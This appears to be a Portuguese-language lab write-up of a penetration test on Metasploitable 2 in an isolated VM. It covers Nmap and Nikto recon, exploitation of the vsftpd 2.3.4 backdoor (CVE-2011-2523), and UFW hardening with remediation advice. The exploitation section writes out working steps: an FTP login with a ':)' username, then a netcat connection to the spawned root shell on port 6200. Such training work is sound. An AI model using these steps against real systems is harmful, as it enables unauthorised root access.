
Laboratório virtual controlado de ataque e defesa — exploração do CVE-2011-2523, reconhecimento com Nmap, varredura com Nikto, endurecimento com UFW no Metasploitable 2
Um ambiente virtual controlado simulando cenários reais de ataque e defesa
Este laboratório simula um teste de penetração e um exercício de hardening defensivo do mundo real em um ambiente virtual totalmente isolado. Demonstra todo o ciclo de vida da segurança ofensiva — desde o reconhecimento até a exploração — e os controles defensivos que mitigariam cada risco.
Resultado chave: Acesso root completo na máquina alvo em menos de 60 segundos explorando um backdoor conhecido, sem credenciais e sem ferramentas especiais.
| Componente | Detalhes |
|---|---|
| Hipervisor | VMware Workstation |
| Rede | Host-Only / NAT (totalmente isolado) |
| SO Atacante | Ubuntu 24 LTS |
| SO Alvo | Metasploitable 2 (Linux 2.6.x) |
| IP do Atacante | 192.168.148.255 |
| IP do Alvo | 192.168.148.130 |
Reconhecimento → Varredura → Exploração → Defesa & Hardening
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt
Principais descobertas — 23 portas abertas no total:
| Porta | Serviço | Versão | Risco |
|---|---|---|---|
| 21 | FTP | vsftpd 2.3.4 | 🔴 CRÍTICO — Backdoor conhecido (CVE-2011-2523) |
| 22 | SSH | OpenSSH 4.7p1 | 🟡 MÉDIO — Desatualizado |
| 23 | Telnet | Linux telnetd | 🟠 ALTO — Protocolo em texto claro |
| 80 | HTTP | Apache 2.2.8 | 🟠 ALTO — Múltiplos CVEs |
| 1524 | Bindshell | Shell root | 🔴 CRÍTICO — Shell root aberto |
| 3306 | MySQL | 5.0.51a | 🟠 ALTO — Banco de dados exposto |
| 5900 | VNC | Protocolo 3.3 | 🟠 ALTO — Autenticação fraca |
| 6667 | IRC | UnrealIRCd | 🔴 CRÍTICO — Backdoor conhecido |
nikto -h http://192.168.148.130 -o nikto_before.txt
18 vulnerabilidades encontradas, incluindo:
phpinfo.php vazando configuração completa do servidor/doc/, /test/vsftpd 2.3.4 contém um backdoor introduzido por meio de um comprometimento da cadeia de suprimentos. Enviar um nome de usuário terminado em :) faz com que o servidor abra um shell root na porta 6200.
# Step 1 — Trigger the backdoor via FTP
ftp 192.168.148.130
# Username: backdoor:) Password: anything
# Step 2 — Connect to the spawned shell
nc 192.168.148.130 6200
# Step 3 — Verify access
whoami
# → root
Resultado: Acesso completo ao nível root alcançado em < 60 segundos — sem credenciais, sem necessidade de framework de exploração.
Impacto: Um atacante com acesso root pode ler/modificar/excluir qualquer arquivo, instalar malware, exfiltrar dados ou fazer pivot para outros hosts na rede.
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp # SSH only
sudo ufw status verbose
| Vulnerabilidade | Correção |
|---|---|
| Backdoor vsftpd 2.3.4 | Atualizar para vsftpd 3.x ou migrar para SFTP |
| Shell root aberto (porta 1524) | Desabilitar imediatamente, auditar instalação |
| Telnet (porta 23) | Desabilitar — impor apenas SSH |
| phpMyAdmin exposto | Restringir por IP, exigir autenticação forte |
| MySQL exposto (porta 3306) | Vincular ao localhost, bloquear acesso externo |
| VNC exposto (porta 5900) | Restringir por IP ou desabilitar |
| Indexação de diretório | Apache: Options -Indexes |
| HTTP TRACE | Apache: TraceEnable off |
| Apache + PHP desatualizados | Atualizar para versões LTS suportadas |
Veja report.md para a avaliação completa — metodologia completa, saídas de comandos, tabela de descobertas, etapas de exploração e todas as recomendações de remediação.
Este laboratório foi conduzido em um ambiente virtual totalmente isolado usando software intencionalmente vulnerável (Metasploitable 2). Todas as técnicas são apenas para fins educacionais e de portfólio. Não replique em sistemas que você não possui ou para os quais não tenha permissão escrita explícita para testar.
| Ferramenta | Finalidade |
|---|---|
| Nmap | Varredura de portas e detecção de serviços |
| Nikto | Varredura de vulnerabilidades web |
| Netcat | Conexão ao shell do backdoor |
| UFW | Configuração de firewall baseado em host |
| Cliente FTP | Acionamento do backdoor vsftpd |
| VMware Workstation | Virtualização do laboratório |
Autor: Amir Mohammad Marwi